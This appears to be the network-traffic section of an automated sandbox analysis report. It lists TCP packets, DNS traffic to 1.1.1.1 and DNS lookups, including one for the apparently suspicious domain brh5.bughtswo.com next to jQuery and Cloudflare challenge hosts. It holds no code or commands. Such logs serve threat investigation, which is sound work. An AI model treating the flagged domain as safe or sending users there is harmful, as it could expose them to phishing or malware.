                                                            Jan 7, 2025 21:28:59.382617950 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.383007050 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.383047104 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.383377075 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.383707047 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.383840084 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.383855104 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.403963089 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.404022932 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.404304981 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:59.404320955 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.404330969 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:59.404397964 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:59.427335978 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.434537888 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.520797968 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.520873070 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.520940065 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.521533966 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.521549940 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.581706047 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.581749916 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.582058907 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.582261086 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:59.582276106 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.086314917 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.086740971 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.086755991 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.087080002 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.088324070 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.088386059 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.088861942 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.135339022 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.249066114 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.249154091 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.249221087 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.249237061 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.249274969 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.249840021 CET49732443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.249854088 CET44349732104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.288700104 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.288753033 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.288872957 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.289071083 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.289086103 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.816306114 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.816601992 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.816634893 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.816966057 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.817259073 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.817312002 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.817394018 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.817486048 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.817523956 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:00.817629099 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:00.817647934 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.043493032 CET49673443192.168.2.16204.79.197.203
                                                            Jan 7, 2025 21:29:01.073513985 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.073566914 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.073596954 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.073626041 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.073626995 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.073646069 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.073657990 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.073668957 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.073692083 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.074217081 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.074559927 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.074588060 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.074611902 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.074613094 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.074630022 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.074651957 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.078253031 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.078336954 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.078356028 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.123503923 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160384893 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160449982 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160489082 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160520077 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160518885 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160538912 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160557985 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160562038 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160598993 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160600901 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160609007 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160649061 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160655975 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160681963 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160713911 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160722017 CET44349733104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.160728931 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160753012 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.160763025 CET49733443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.163405895 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.163430929 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.163521051 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.163734913 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.163744926 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.633527040 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.633850098 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.633881092 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.634231091 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.634521961 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.634587049 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.634651899 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.679332972 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.787911892 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.787991047 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:01.788050890 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.788758039 CET49735443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:01.788781881 CET44349735104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:04.702084064 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:05.003556013 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:05.609587908 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:05.846570969 CET49673443192.168.2.16204.79.197.203
                                                            Jan 7, 2025 21:29:06.284842014 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.284878969 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.284980059 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.285202026 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.285218000 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.758552074 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.758810043 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.758822918 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.759160995 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.759541035 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.759608030 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.759696960 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.759767056 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.759800911 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.759905100 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:06.759937048 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:06.818619967 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:07.051275969 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.051343918 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.051403046 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.051428080 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.051438093 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.051497936 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.051564932 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.054430962 CET49739443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.054430962 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.054442883 CET44349739104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.054454088 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.054615021 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.054867029 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.054883003 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.122086048 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.122114897 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.123908043 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.124093056 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.124108076 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.451477051 CET44349718142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:07.451546907 CET44349718142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:07.451705933 CET49718443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:07.765347004 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.765666008 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.765686035 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.766047955 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.766693115 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.766693115 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.766782045 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.770389080 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.770663977 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.770675898 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.771761894 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.772068977 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.776068926 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.776283979 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.776290894 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.807545900 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.819336891 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.823503971 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.823513031 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:07.871510029 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:07.914196014 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.914267063 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:07.914319038 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.914961100 CET49740443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:29:07.914978981 CET44349740104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:29:08.289872885 CET49718443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:08.289891005 CET44349718142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:08.365803957 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:08.365914106 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:08.366000891 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:08.366627932 CET49741443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:08.366643906 CET44349741188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:08.465902090 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:08.465933084 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:08.466012001 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:08.466264009 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:08.466284037 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.086682081 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.086930990 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.086947918 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.088504076 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.088568926 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.088843107 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.088898897 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.088898897 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.088918924 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.089085102 CET44349744188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.089154959 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.089157104 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.089157104 CET49744443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.089179039 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.089278936 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.089447975 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.089461088 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.164664984 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:09.228548050 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:09.467955112 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:09.565829992 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.566271067 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.566304922 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.567353010 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.567452908 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.567790031 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.567878008 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.573579073 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.615343094 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.628196001 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:09.628217936 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:09.675632954 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:10.075526953 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:10.149553061 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:10.149688005 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:10.149957895 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:10.150496006 CET49745443192.168.2.16188.114.97.3
                                                            Jan 7, 2025 21:29:10.150511026 CET44349745188.114.97.3192.168.2.16
                                                            Jan 7, 2025 21:29:11.287674904 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:13.704504013 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:14.037516117 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:15.453632116 CET49673443192.168.2.16204.79.197.203
                                                            Jan 7, 2025 21:29:18.509656906 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:23.647533894 CET49678443192.168.2.1620.189.173.10
                                                            Jan 7, 2025 21:29:28.121640921 CET4968080192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:29:56.922630072 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:56.922653913 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:56.922735929 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:56.922952890 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:56.922965050 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:57.572436094 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:57.572715998 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:57.572727919 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:57.573065996 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:57.573371887 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:29:57.573431969 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:29:57.624636889 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:30:07.473866940 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:30:07.473953009 CET44349788142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:30:07.474026918 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:30:08.296022892 CET49788443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:30:08.296036959 CET44349788142.250.184.228192.168.2.16
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 21:28:52.080424070 CET53576701.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:52.124165058 CET53540031.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:52.149657011 CET6552153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:52.149816990 CET5479253192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:52.163265944 CET53547921.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:52.163894892 CET53655211.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:53.342993021 CET53552821.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.026998997 CET5679553192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.027199030 CET6227153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.027590036 CET6302353192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.027753115 CET6005153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.028117895 CET5023453192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.028286934 CET5185553192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.034116983 CET53567951.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.034159899 CET53622711.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.034171104 CET53630231.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.034396887 CET53600511.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.034925938 CET53518551.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.035181046 CET53502341.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.757869959 CET6159353192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.758052111 CET5474153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.764324903 CET53615931.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.764866114 CET53547411.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.820749044 CET6272653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.820935965 CET6178353192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:54.828031063 CET53627261.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:54.828125954 CET53617831.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:55.403208971 CET6016953192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:55.403434038 CET5986753192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:55.409773111 CET53601691.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:55.411042929 CET53598671.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:55.420419931 CET5478353192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:55.420960903 CET5827153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:55.427594900 CET53582711.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:55.428021908 CET53547831.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:56.867439032 CET6194953192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:56.867747068 CET5097153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:56.874488115 CET53619491.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:56.874631882 CET53509711.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.010817051 CET4994853192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:58.010989904 CET5459853192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:28:58.017754078 CET53499481.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.018115044 CET53545981.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:07.057348013 CET5070653192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:07.057657957 CET5989453192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:07.108180046 CET53507061.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:07.208336115 CET53598941.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:08.374011040 CET6458753192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:08.374332905 CET5998353192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:08.375389099 CET5421453192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:08.375555992 CET5204253192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:08.437891006 CET53520421.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:08.465347052 CET53542141.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:09.531014919 CET5715553192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:09.531286001 CET5703453192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:09.538589954 CET53570341.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:10.384141922 CET53576081.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:11.809402943 CET5455553192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:11.809628963 CET5416453192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:11.817743063 CET53541641.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:12.870176077 CET6425453192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:12.870465994 CET6368153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:12.877341986 CET53642541.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:12.877902031 CET53636811.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:17.708086967 CET53496611.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:29.417992115 CET53527131.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:52.017131090 CET53622971.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:52.351164103 CET53615321.1.1.1192.168.2.16
                                                            Jan 7, 2025 21:29:58.025979996 CET6272153192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:29:58.026123047 CET5869953192.168.2.161.1.1.1
                                                            Jan 7, 2025 21:30:00.882627964 CET138138192.168.2.16192.168.2.255
                                                            Jan 7, 2025 21:30:23.358581066 CET53538661.1.1.1192.168.2.16
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Jan 7, 2025 21:29:07.212193966 CET192.168.2.161.1.1.1c2bf(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 7, 2025 21:28:52.149657011 CET192.168.2.161.1.1.10xba4fStandard query (0)brh5.bughtswo.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:52.149816990 CET192.168.2.161.1.1.10xdd20Standard query (0)brh5.bughtswo.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.026998997 CET192.168.2.161.1.1.10x1c8fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.027199030 CET192.168.2.161.1.1.10x78faStandard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.027590036 CET192.168.2.161.1.1.10x3633Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:28:54.027753115 CET192.168.2.161.1.1.10x733aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
